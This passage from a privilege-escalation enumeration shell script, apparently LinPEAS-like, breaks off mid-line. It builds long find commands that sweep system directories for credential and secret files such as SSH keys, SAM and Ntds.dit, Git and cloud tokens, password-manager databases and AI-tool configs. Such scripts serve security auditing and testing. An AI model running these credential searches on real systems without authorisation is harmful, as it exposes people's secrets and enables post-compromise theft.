\"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 783 FIND_SYS=`eval_bckgrd "find ${ROOT_FOLDER}sys -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 784 FIND_SYSTEM=`eval_bckgrd "find ${ROOT_FOLDER}system -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 785 FIND_SYSTEMD=`eval_bckgrd "find ${ROOT_FOLDER}systemd -name \"rocketchat.service\" -o -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 786 FIND_TMP=`eval_bckgrd "find ${ROOT_FOLDER}tmp -name \"*.timer\" -o -name \"ssh-agent.sock\" -o -name \"password*.ibd\" -o -name \".boto\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"sess_*\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"agent.*\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 787 FIND_USR=`eval_bckgrd "find ${ROOT_FOLDER}usr -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"ssh*config\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 788 FIND_VAR=`eval_bckgrd "find ${ROOT_FOLDER}var -name \"*.timer\" -o -name \".boto\" -o -name \"password*.ibd\" -o -name \"fastcgi_params\" -o -name \".bashrc\" -o -name \"my.ini\" -o -name \"*.pem\" -o -name \"scclient.exe\" -o -name \"krb5cc_*\" -o -name \"crio.sock\" -o -name \"ffftp.ini\" -o -name \"sitemanager.xml\" -o -name \"bitcoin.conf\" -o -name \"*.der\" -o -name \"wp-config.php\" -o -name \"glusterfs.key\" -o -name \"influxdb.conf\" -o -name \"SecEvent.Evt\" -o -name \".pgpass\" -o -name \"plum.sqlite\" -o -name \"gitlab.rm\" -o -name \"state.vscdb.backup\" -o -name \"atlantis.db\" -o -name \"sess_*\" -o -name \"hosts.equiv\" -o -name \"default.sav\" -o -name \"snyk.json\" -o -name \"*vnc*.txt\" -o -name \"rsyncd.secrets\" -o -name \"access_tokens.db\" -o -name \"AzureRMContext.json\" -o -name \"*.asc\" -o -name \"containerd.sock\" -o -name \"software\" -o -name \".git-credentials\" -o -name \"*.rdg\" -o -name \"wsl.exe\" -o -name \"backup\" -o -name \"sslkeylog.log\" -o -name \"elasticsearch.y*ml\" -o -name \"passbolt.php\" -o -name \"*.tfstate\" -o -name \"anaconda-ks.cfg\" -o -name \"ipsec.conf\" -o -name \"storage.php\" -o -name \"cloud.cfg\" -o -name \"pg_hba.conf\" -o -name \"psk.txt\" -o -name \"aliases\" -o -name \"unattend.inf\" -o -name \"sssd.conf\" -o -name \".profile\" -o -name \"system.sav\" -o -name \"snyk.config.json\" -o -name \"sites.ini\" -o -name \"*.gpg\" -o -name \"sentry.conf.py\" -o -name \"zabbix_server.conf\" -o -name \"AppEvent.Evt\" -o -name \"gpg-agent.conf\" -o -name \"config.xml\" -o -name \".vault-token\" -o -name \"filezilla.xml\" -o -name \".env*\" -o -name \"authorized_hosts\" -o -name \"rsyncd.conf\" -o -name \"adc.json\" -o -name \"passwd.ibd\" -o -name \"krb5.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"FreePBX.conf\" -o -name \"admin.conf\" -o -name \"api_key\" -o -name \"KeePass.ini\" -o -name \"*.keyring\" -o -name \".wgetrc\" -o -name \"secrets.ldb\" -o -name \"vault-ssh-helper.hcl\" -o -name \"*.kdbx\" -o -name \".plan\" -o -name \"*.vhd\" -o -name \"environment\" -o -name \"*.crt\" -o -name \"error.log\" -o -name \"*vnc*.ini\" -o -name \".lesshst\" -o -name \"*.gnupg\" -o -name \"rpcd\" -o -name \"rocketchat.service\" -o -name \"docker.sock\" -o -name \"index.dat\" -o -name \"crontab-ui.service\" -o -name \"fat.config\" -o -name \"unattend.xml\" -o -name \"legacy_credentials.db\" -o -name \"secret.asc\" -o -name \"autologin.conf\" -o -name \"server.xml\" -o -name \"mysqld.cnf\" -o -name \"glusterfs.ca\" -o -name \"known_hosts\" -o -name \"creds*\" -o -name \"*.ftpconfig\" -o -name \"firebase-tools.json\" -o -name \".claude.json\" -o -name \"mongod*.conf\" -o -name \"sysprep.inf\" -o -name \"httpd.conf\" -o -name \"gitlab.yml\" -o -name \"sysprep.xml\" -o -name \"NetSetup.log\" -o -name \"protecteduserkey.bin\" -o -name \"pgadmin4.db\" -o -name \"php.ini\" -o -name \"*.ovpn\" -o -name \"passwd\" -o -name \"trustdb.gpg\" -o -name \"ftp.config\" -o -name \"autounattend.xml\" -o -name \"*.vhdx\" -o -name \"secrets.yml\" -o -name \"hostapd.conf\" -o -name \"*.maintenance*\" -o -name \"supervisord.conf\" -o -name \"access_tokens.json\" -o -name \"*.pcap\" -o -name \"storage.json\" -o -name \".sudo_as_admin_successful\" -o -name \"*.csr\" -o -name \"ConsoleHost_history.txt\" -o -name \"KeePass.config*\" -o -name \"kcpassword\" -o -name \"redis.conf\" -o -name \"glusterfs.pem\" -o -name \"web*.config\" -o -name \"mosquitto.conf\" -o -name \"webserver_config.py\" -o -name \"sip.conf\" -o -name \"*credential*\" -o -name \"SAM\" -o -name \"*.key\" -o -name \"printers.xml\" -o -name \"pubring.kbx\" -o -name \".mcp.json\" -o -name \"kubelet.conf\" -o -name \"service_principal_entries.bin\" -o -name \".ldaprc\" -o -name \".recently-used.xbel\" -o -name \".Xauthority\" -o -name \"accessTokens.json\" -o -name \"pgadmin*.db\" -o -name \"*config*.php\" -o -name \"unattend.txt\" -o -name \"credentials.db\" -o -name \".flyrc\" -o -name \"iis6.log\" -o -name \"credentials.tfrc.json\" -o -name \"security.sav\" -o -name \"cesi.conf\" -o -name \"Dockerfile\" -o -name \"*.psk\" -o -name \"kadm5.acl\" -o -name \"scheduledtasks.xml\" -o -name \"*.cer\" -o -name \"id_rsa*\" -o -name \"racoon.conf\" -o -name \"private-keys-v1.d/*.key\" -o -name \"*.socket\" -o -name \"ddclient.conf\" -o -name \"settings.php\" -o -name \"TokenCache.dat\" -o -name \".gitconfig\" -o -name \"datasources.xml\" -o -name \"*.sqlite\" -o -name \"*vnc*.xml\" -o -name \"setupinfo.bak\" -o -name \"nginx.conf\" -o -name \".roadtools_auth\" -o -name \".erlang.cookie\" -o -name \"pwd.ibd\" -o -name \".git\" -o -name \"ftp.ini\" -o -name \"recentservers.xml\" -o -name \".htpasswd\" -o -name \"*.tf\" -o -name \"appcmd.exe\" -o -name \"msal_http_cache.bin\" -o -name \"*.swp\" -o -name \".mylogin.cnf\" -o -name \"*.pcapng\" -o -name \"RDCMan.settings\" -o -name \"postgresql.conf\" -o -name \"crontab.db\" -o -name \"id_dsa*\" -o -name \".credentials.json\" -o -name \"*.pgp\" -o -name \"rktlet.sock\" -o -name \"grafana.ini\" -o -name \"frakti.sock\" -o -name \"config.php\" -o -name \"*.vmdk\" -o -name \"docker.socket\" -o -name \"credentials.xml\" -o -name \"gvm-tools.conf\" -o -name \"smb.conf\" -o -name \"db.php\" -o -name \"vsftpd.conf\" -o -name \"secring.gpg\" -o -name \"snmpd.conf\" -o -name \"*.pfx\" -o -name \".github\" -o -name \".k5login\" -o -name \"https-xampp.conf\" -o -name \"msal_token_cache.bin\" -o -name \"database.php\" -o -name \"*.db\" -o -name \"*.jks\" -o -name \"*.viminfo\" -o -name \"docker-compose.yml\" -o -name \"wcx_ftp.ini\" -o -name \"ntuser.dat\" -o -name \"*_history*\" -o -name \"*kubeconfig*\" -o -name \"amportal.conf\" -o -name \"pagefile.sys\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"unattended.xml\" -o -name \"keys.log\" -o -name \"Ntds.dit\" -o -name \"groups.xml\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"airflow.cfg\" -o -name \"state.vscdb\" -o -name \"winscp.ini\" -o -name \"mariadb.cnf\" -o -name \"log4j-core*.jar\" -o -name \"*.p12\" -o -name \"KeePass.enforced*\" -o -name \"bootstrap-kubelet.conf\" -o -name \"https.conf\" -o -name \"software.sav\" -o -name \"*.pub\" -o -name \"apt.conf\" -o -name \"service_principal_entries.json\" -o -name \"access.log\" -o -name \".google_authenticator\" -o -name \"*vnc*.c*nf*\" -o -name \"*password*\" -o -name \"000-default.conf\" -o -name \".secrets.mkey\" -o -name \"authorized_keys\" -o -name \"azureProfile.json\" -o -name \"ws_ftp.ini\" -o -name \"dockershim.sock\" -o -name \"Elastix.conf\" -o -name \"autologin\" -o -name \"*.service\" -o -name \".rhosts\" -o -name \"debian.cnf\" -o -name \"clouds.config\" -o -name \"jetty-realm.properties\" -o -name \"*.keytab\" -o -name \"bash.exe\" -o -name \"msal_token_cache.json\" -o -name \"drives.xml\" -o -name \".msmtprc\" -o -name \"FreeSSHDservice.ini\" -o -name \"SYSTEM\" -o -name \"setupinfo\" -o -name \"*.sqlite3\" -o -name \"kibana.y*ml\" -o -name \"tomcat-users.xml\" -o -name \"hudson.util.Secret\" -o -name \"ipsec.secrets\" -o -name \"backups\" -o -name \"master.key\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 789 FIND_CONCOURSE_AUTH=`eval_bckgrd "find ${ROOT_FOLDER}concourse-auth -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 790 FIND_CONCOURSE_KEYS=`eval_bckgrd "find ${ROOT_FOLDER}concourse-keys -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` 791 792 wait # Always wait at the end 793 CONT_THREADS=0 #Reset the threads counter 794 fi 795 if [ "$SEARCH_IN_FOLDER" ] || echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets || echo $CHECKS | grep -q software_information || echo $CHECKS | grep -q interesting_files; then 796 #GENERATE THE STORAGES OF THE FOUND FILES 797 PSTORAGE_SYSTEMD=$(echo -e "$FIND_TMP\n$FIND_SNAP\n$FIND_ETC\n$FIND_CONCOURSE_KEYS\n$FIND_OPT\n$FIND_VAR\n$FIND_SYSTEM\n$FIND_SBIN\n$FIND_MEDIA\n$FIND_USR\n$FIND_SRV\n$FIND_BIN\n$FIND_SYSTEMD\n$FIND_LIB32\n$FIND_HOMESEARCH\n$FIND_CDROM\n$FIND_MNT\n$FIND_LIB64\n$FIND_CACHE\n$FIND_PRIVATE\n$FIND_RUN\n$FIND_CONCOURSE_AUTH\n$FIND_LIB\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM" | grep -E 